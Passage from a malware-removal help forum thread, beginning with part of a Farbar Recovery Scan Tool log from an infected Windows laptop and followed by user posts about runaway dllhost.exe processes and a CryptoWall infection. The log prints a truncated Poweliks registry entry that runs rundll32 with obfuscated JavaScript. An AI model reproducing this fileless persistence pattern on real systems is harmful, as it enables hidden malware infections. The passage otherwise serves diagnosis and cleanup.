(HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUSR_{C633216E-FF30-45B6-B2AB-21922A9353EF}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2687503) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{B1FA5E8C-2342-45AF-8A62-5E860042F8DF}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2760758) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{24BD08F8-FF6E-4DD8-BE49-3659AE78A819}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2767886) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{9CFD026D-EB1C-48C2-9DD2-8E8875F251B2}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2825640) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{BA610006-2C39-4419-9834-CF61AB24810A}) (Version: - Microsoft) Update for Microsoft OneNote 2010 (KB2553290) 32-Bit Edition (HKLM-x32\...\{90140000-00A1-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{9865DC3A-2898-48D9-B96A-46397571C934}) (Version: - Microsoft) Update for Microsoft OneNote 2010 (KB2810072) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{3EFF1957-7DEA-4C7A-8E9C-2D6D58E4B2ED}) (Version: - Microsoft) Update for Microsoft OneNote 2010 (KB2810072) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{3EFF1957-7DEA-4C7A-8E9C-2D6D58E4B2ED}) (Version: - Microsoft) Update for Microsoft Outlook 2010 (KB2687623) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{47894754-0FEC-4920-9A65-6C1E732587AC}) (Version: - Microsoft) Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{1EEFF749-6F29-4F0B-AB08-4C6EA52AA110}) (Version: - Microsoft) Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{BC6DFBFD-16DD-47E1-A7EF-2C062930FA4F}) (Version: - Microsoft) Update for Microsoft PowerPoint 2010 (KB2553145) 32-Bit Edition (HKLM-x32\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{DA2F7ECE-6629-4A80-9CDE-EC95261B75E2}) (Version: - Microsoft) Update for Microsoft PowerPoint 2010 (KB2553145) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{190EC86F-5867-4D7A-B9F3-D14D82C26F3D}) (Version: - Microsoft) Update for Microsoft SharePoint Workspace 2010 (KB2589371) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{5DA2D071-A54C-47C0-83E5-43C63DBFD936}) (Version: - Microsoft) Update for Microsoft SharePoint Workspace 2010 (KB2589371) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{5DA2D071-A54C-47C0-83E5-43C63DBFD936}) (Version: - Microsoft) Update for Microsoft Visio Viewer 2010 (KB2810066) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{8C55AA83-54C2-4236-A622-78440A411DC5}) (Version: - Microsoft) Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation) Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation) Visual Studio Tools for the Office system 3.0 Runtime (x32 Version: 9.0.30729 - Microsoft Corporation) Hidden Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation) WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent) WildTangent Games App (x32 Version: 4.0.9.3 - WildTangent) Hidden ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-2604008792-1424924497-987845697-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? ==================== Restore Points ========================= 25-09-2014 00:23:43 Scheduled Checkpoint 06-10-2014 01:25:19 Scheduled Checkpoint 08-10-2014 14:09:56 Restore Operation 08-10-2014 20:17:22 before dllrepair 16-10-2014 18:44:31 Scheduled Checkpoint ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2012-07-26 01:26 - 2012-07-26 01:26 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {08FB183D-EA25-418D-9C44-B3C88CB231CD} - System32\Tasks\iuEmailOutlookAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe [2012-08-22] () Task: {1AAFF332-5C62-4558-9991-DAA649C4C9C5} - System32\Tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask => Rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask Task: {1CA5824F-E16C-4217-9D91-9EB83FC6C33D} - System32\Tasks\PMMUpdate => C:\Program Files\EgisTec IPS\PMMUpdate.exe [2012-07-11] (Egis Technology Inc.) Task: {20B1DCDB-6B19-4FFF-B643-CCAB878B672E} - System32\Tasks\EPSON XP-310 Series Update {901D3D34-B261-4978-B173-D1F87C7D7DE3} => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLBE.EXE [2013-02-28] (SEIKO EPSON CORPORATION) Task: {22CF35EA-EB57-4E66-90C9-5DEA2818D506} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTray.exe [2012-10-23] (Acer Incorporated) Task: {23A5D8BE-9196-40EB-BD89-794398B2B073} - System32\Tasks\Microsoft\Windows\WS\WSRefreshBannedAppsListTask => Rundll32.exe WSClient.dll,RefreshBannedAppsList Task: {3605355B-5E7F-4866-B77F-145975D92514} - System32\Tasks\ALU => C:\Program Files (x86)\Acer\Live Updater\updater.exe [2012-11-06] () Task: {4C3770B4-6FBD-4A9F-AA90-2A2F43948E15} - System32\Tasks\EPSON XP-310 Series Invitation {901D3D34-B261-4978-B173-D1F87C7D7DE3} => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLBE.EXE [2013-02-28] (SEIKO EPSON CORPORATION) Task: {50350250-5281-4567-9FAA-ED2C60157088} - System32\Tasks\Microsoft\Windows\Setup\Pre-staged GDR Notification => C:\Windows\system32\NotificationUI.exe [2013-08-16] (Microsoft Corporation) Task: {6F383F9A-7EB9-430E-9E58-1EA32C90E00F} - System32\Tasks\Leader Technologies\LTCM Client\New Message Check - jalockma => C:\Program Files (x86)\LTCM Client\ltcmClient.exe [2011-04-07] (Leader Technologies Inc.) Task: {80991203-C778-4A39-B0ED-A50B2C3B75D2} - System32\Tasks\ALUAgent => C:\Program Files (x86)\Acer\Live Updater\liveupdater_agent.exe [2012-06-21] () Task: {97A9A43C-E344-45D4-876D-D2BD5F4D9CB6} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2012-09-19] (CyberLink) Task: {A72208BF-7A49-4FB8-B684-252375F3443A} - System32\Tasks\Microsoft\Windows\WS\License Validation => Rundll32.exe WSClient.dll,WSpTLR licensing Task: {C3D4C166-5A10-466B-B24D-212915BA7263} - System32\Tasks\iuBrowserIEAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe [2012-08-22] () Task: {C6A88F2D-53D2-4805-9D69-443738A1847C} - System32\Tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState => Rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState Task: {E9727A2B-0E3C-4782-B4F4-3E448FA9A8C0} - System32\Tasks\EgisUpdate => C:\Program Files\EgisTec IPS\EgisUpdate.exe [2012-07-11] (Egis Technology Inc.) Task: {EBF06DEC-4228-4813-AC0C-62821AE4E330} - System32\Tasks\Microsoft\Windows\Application Experience\StartupAppTask => Rundll32.exe Startupscan.dll,SusRunTask Task: C:\Windows\Tasks\EPSON XP-310 Series Invitation {901D3D34-B261-4978-B173-D1F87C7D7DE3}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLBE.EXE Task: C:\Windows\Tasks\EPSON XP-310 Series Update {901D3D34-B261-4978-B173-D1F87C7D7DE3}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_ITSLBE.EXE ==================== Loaded Modules (whitelisted) ============= 2011-03-17 00:07 - 2011-03-17 00:07 - 04297568 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF 2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll 2012-06-21 22:12 - 2012-06-21 22:12 - 01407568 _____ () C:\Program Files (x86)\EgisTec MyWinLocker\x64\LIBEAY32.dll 2014-04-16 23:31 - 2014-04-16 23:32 - 00176048 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.0.1119.516_x64__8wekyb3d8bbwe\ModernShared\ErrorReporting\ErrorReporting.dll 2012-08-22 19:04 - 2012-08-22 19:04 - 00044176 _____ () C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe 2012-08-22 19:04 - 2012-08-22 19:04 - 00025232 _____ () C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe 2012-11-02 20:38 - 2012-11-02 20:38 - 00465384 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\sqlite3.dll 2012-11-02 20:37 - 2012-11-02 20:37 - 00125504 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\MailConverter32.dll 2012-11-02 20:38 - 2012-11-02 20:38 - 00155712 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\VolumeSnapshot.dll 2012-11-02 20:37 - 2012-11-02 20:37 - 00118336 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\Online.dll 2012-11-02 20:37 - 2012-11-02 20:37 - 01081408 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\ACE.dll 2012-11-02 20:37 - 2012-11-02 20:37 - 00052288 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\OsSettingPort.dll 2012-11-02 20:37 - 2012-11-02 20:37 - 00727616 _____ () C:\Program Files (x86)\NTI\Acer Backup Manager\OutlookShadow.dll 2013-01-26 10:00 - 2012-06-24 22:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll 2011-03-17 00:11 - 2011-03-17 00:11 - 04297568 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF 2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver" ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) HKLM\...\StartupApproved\StartupFolder: => "McAfee Security Scan Plus.lnk" HKLM\...\StartupApproved\Run: => "BtPreLoad" HKLM\...\StartupApproved\Run: => "ETDCtrl" HKLM\...\StartupApproved\Run: => "RtHDVBg_Dolby" HKLM\...\StartupApproved\Run: => "HotKeysCmds" HKLM\...\StartupApproved\Run: => "IgfxTray" HKLM\...\StartupApproved\Run: => "Persistence" HKLM\...\StartupApproved\Run: => "RtHDVCpl" HKLM\...\StartupApproved\Run: => "TelevisionFanatic Home Page Guard 64 bit" HKLM\...\StartupApproved\Run32: => "Dolby Home Theater v4" HKLM\...\StartupApproved\Run32: => "Norton Online Backup" HKLM\...\StartupApproved\Run32: => "Adobe ARM" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "BCSSync" HKLM\...\StartupApproved\Run32: => "ApnTBMon" HKLM\...\StartupApproved\Run32: => "mcpltui_exe" HKLM\...\StartupApproved\Run32: => "EEventManager" HKLM\...\StartupApproved\Run32: => "LTCM Client" HKLM\...\StartupApproved\Run32: => "TelevisionFanatic Browser Plugin Loader 64" HKLM\...\StartupApproved\Run32: => "TelevisionFanatic Browser Plugin Loader" HKLM\...\StartupApproved\Run32: => "TelevisionFanatic Search Scope Monitor" HKLM\...\StartupApproved\Run32: => "TelevisionFanatic EPM Support" HKCU\...\StartupApproved\StartupFolder: => "OneNote 2010 Screen Clipper and Launcher.lnk" HKCU\...\StartupApproved\Run: => "Spotify Web Helper" HKCU\...\StartupApproved\Run: => "EPLTarget\P0000000000000000" HKCU\...\StartupApproved\Run: => "AppDataLow" ========================= Accounts: ========================== Administrator (S-1-5-21-2604008792-1424924497-987845697-500 - Administrator - Disabled) Guest (S-1-5-21-2604008792-1424924497-987845697-501 - Limited - Disabled) jalockma (S-1-5-21-2604008792-1424924497-987845697-1001 - Administrator - Enabled) => C:\Users\jalockma ==================== Faulty Device Manager Devices ============= Name: Bluetooth USB Module Description: Bluetooth USB Module Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974} Manufacturer: Qualcomm Atheros Communications Service: BTHUSB Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Event log errors: ========================= Application errors: ================== Error: (10/17/2014 11:09:44 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: BtvStack.exe, version: 8.0.0.220, time stamp: 0x51061e13 Faulting module name: audio.dll, version: 8.0.0.220, time stamp: 0x51061de7 Exception code: 0xc0000005 Fault offset: 0x000000000001aed8 Faulting process id: 0x2278 Faulting application start time: 0xBtvStack.exe0 Faulting application path: BtvStack.exe1 Faulting module path: BtvStack.exe2 Report Id: BtvStack.exe3 Faulting package full name: BtvStack.exe4 Faulting package-relative application ID: BtvStack.exe5 Error: (10/17/2014 07:48:48 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerLaptop) Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (10/17/2014 07:47:06 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16688, time stamp: 0x5010888a Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e Exception code: 0xc0000005 Fault offset: 0x000618d0 Faulting process id: 0xf50 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (10/17/2014 07:46:03 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16688, time stamp: 0x5010888a Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e Exception code: 0xc0000005 Fault offset: 0x000618d0 Faulting process id: 0x24c8 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (10/17/2014 07:43:06 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16688, time stamp: 0x5010888a Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e Exception code: 0xc0000005 Fault offset: 0x000618d0 Faulting process id: 0x2b98 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (10/17/2014 07:42:48 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16688, time stamp: 0x5010888a Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e Exception code: 0xc0000005 Fault offset: 0x000618d0 Faulting process id: 0x26a8 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (10/17/2014 07:29:07 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: BtvStack.exe, version: 8.0.0.220, time stamp: 0x51061e13 Faulting module name: audio.dll, version: 8.0.0.220, time stamp: 0x51061de7 Exception code: 0xc0000005 Fault offset: 0x000000000001aed8 Faulting process id: 0x464 Faulting application start time: 0xBtvStack.exe0 Faulting application path: BtvStack.exe1 Faulting module path: BtvStack.exe2 Report Id: BtvStack.exe3 Faulting package full name: BtvStack.exe4 Faulting package-relative application ID: BtvStack.exe5 Error: (10/16/2014 10:30:08 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: BtvStack.exe, version: 8.0.0.220, time stamp: 0x51061e13 Faulting module name: audio.dll, version: 8.0.0.220, time stamp: 0x51061de7 Exception code: 0xc0000005 Fault offset: 0x000000000001aed8 Faulting process id: 0x10dc Faulting application start time: 0xBtvStack.exe0 Faulting application path: BtvStack.exe1 Faulting module path: BtvStack.exe2 Report Id: BtvStack.exe3 Faulting package full name: BtvStack.exe4 Faulting package-relative application ID: BtvStack.exe5 Error: (10/16/2014 05:39:03 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16688, time stamp: 0x5010888a Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e Exception code: 0xc0000005 Fault offset: 0x000618d0 Faulting process id: 0x21a4 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (10/16/2014 05:36:01 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16688, time stamp: 0x5010888a Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e Exception code: 0xc0000005 Fault offset: 0x000618d0 Faulting process id: 0x2108 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 System errors: ============= Error: (10/17/2014 11:21:28 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 11:20:57 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 11:20:08 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 11:19:15 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 11:18:43 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 08:00:20 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 07:59:48 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 07:59:17 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 07:58:45 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/17/2014 07:58:14 AM) (Source: DCOM) (EventID: 10010) (User: AcerLaptop) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Microsoft Office Sessions: ========================= Error: (10/17/2014 11:09:44 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: BtvStack.exe8.0.0.22051061e13audio.dll8.0.0.22051061de7c0000005000000000001aed8227801cfea0111472afaC:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exeC:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\Modules\Audio\audio.dll9fb7403f-560f-11e4-be8b-7054d2a67f49 Error: (10/17/2014 07:48:48 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AcerLaptop) Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2144927141 Error: (10/17/2014 07:47:06 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe10.0.9200.166885010888antdll.dll6.2.9200.16578515fac6ec0000005000618d0f5001cfea0009b7be32C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dll5136fee4-55f3-11e4-be8b-7054d2a67f49 Error: (10/17/2014 07:46:03 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe10.0.9200.166885010888antdll.dll6.2.9200.16578515fac6ec0000005000618d024c801cfe9ffe206b2a0C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dll2bcb3da0-55f3-11e4-be8b-7054d2a67f49 Error: (10/17/2014 07:43:06 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe10.0.9200.166885010888antdll.dll6.2.9200.16578515fac6ec0000005000618d02b9801cfe9ff7a2e6911C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dllc211d3df-55f2-11e4-be8b-7054d2a67f49 Error: (10/17/2014 07:42:48 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe10.0.9200.166885010888antdll.dll6.2.9200.16578515fac6ec0000005000618d026a801cfe9ff6fe8c9a5C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dllb78f9631-55f2-11e4-be8b-7054d2a67f49 Error: (10/17/2014 07:29:07 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: BtvStack.exe8.0.0.22051061e13audio.dll8.0.0.22051061de7c0000005000000000001aed846401cfe9fd854ef786C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exeC:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\Modules\Audio\audio.dllcdda008b-55f0-11e4-be8b-7054d2a67f49 Error: (10/16/2014 10:30:08 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: BtvStack.exe8.0.0.22051061e13audio.dll8.0.0.22051061de7c0000005000000000001aed810dc01cfe9b231253886C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exeC:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\Modules\Audio\audio.dll8292bb1b-55a5-11e4-be8b-7054d2a67f49 Error: (10/16/2014 05:39:03 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe10.0.9200.166885010888antdll.dll6.2.9200.16578515fac6ec0000005000618d021a401cfe98993161676C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dlld85da38f-557c-11e4-be8a-2016d8aa05dc Error: (10/16/2014 05:36:01 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe10.0.9200.166885010888antdll.dll6.2.9200.16578515fac6ec0000005000618d0210801cfe988f85dca86C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dll6c17933e-557c-11e4-be8a-2016d8aa05dc CodeIntegrity Errors: =================================== Date: 2014-03-14 17:09:42.065 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\WindowsApps\TuneIn.TuneInRadio_1.0.1.587_neutral__6bhtb546zcxnj\TuneIn.exe) attempted to load \Device\HarddiskVolume4\Program Files\WindowsApps\TuneIn.TuneInRadio_1.0.1.587_neutral__6bhtb546zcxnj\Funq.dll with signing level Unsigned while the system requires signing level 6 or better to load. ==================== Memory info =========================== Processor: Intel® Pentium® CPU B960 @ 2.20GHz Percentage of memory in use: 47% Total physical RAM: 3912.27 MB Available physical RAM: 2065.02 MB Total Pagefile: 15688.27 MB Available Pagefile: 13693.68 MB Total Virtual: 8192 MB Available Virtual: 8191.78 MB ==================== Drives ================================ Drive c: (Acer) (Fixed) (Total:447.95 GB) (Free:379.01 GB) NTFS Drive e: () (Removable) (Total:3.72 GB) (Free:1.79 GB) FAT32 ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (Size: 465.8 GB) (Disk ID: F46FED94) Partition: GPT Partition Type. ======================================================== Disk: 1 (MBR Code: Windows XP) (Size: 3.7 GB) (Disk ID: A2ABA2AB) Partition 1: (Not Active) - (Size=3.7 GB) - (Type=0B) ==================== End Of Log ============================ FRST.txt Addition.txt
  6. Hi, I've been having a problem with dllhost.exe*32 starting tens of instances and restarting every few minutes after I have ended the correct process tree. This seems to need a personal fix, and it is an urgent matter for me to get my computer fixed ASAP, so any help would be extremely kind. Thank you for reading this and maybe helping out! Here are the FRST scans of my computer. If anything else is needed, I'll be happy to oblige. FRST.txt Addition.txt
  7. I have multiple instances of this running on my computer and hogging up resources. They seem to be trying to launch IE browser sites. I ran Malware Bytes Scan but it says everythign is clean. These dll processes come on at startup even before i launch anything. Malware Bytes says its blocking the website and i exclude it but the multiple processes still show up. My computer is very slow. I also ran Trend Micro Office Scan Antiviurs and it found and quarnatied three files but the processes still keep showing up.
  8. Hi, There! I was struck by the dreaded CryptoWall ransomware. I first knew something was wrong when I noticed 20 to 30 instances of COM Surrogate (32 bit)/dllhost.exe popping up and running at once. A few days later, I found the 3 files left behind in each folder where files were encrypted. Thanks to MalwareByes Anti-Malware, I was able to remove Cryptowall. Since Windows Defender had let the virus through, I switched to Avast, along with purchasing the premium version of MWBAM. Now, I still notice both MWBAM and Avast popping up with prevention notifications, even while I'm not starting/clicking on anything. I've also noticed the COM Surrogates popping up on occasion. Sometimes, the machine behaves normally for a while. I believe that Avast and MWBAM are preventing these processes from doing anything bad, but I have no way of knowing. At a minimum, they impact performance, so I use Task Manager to end them as they come up. I appreciate any assistance you can 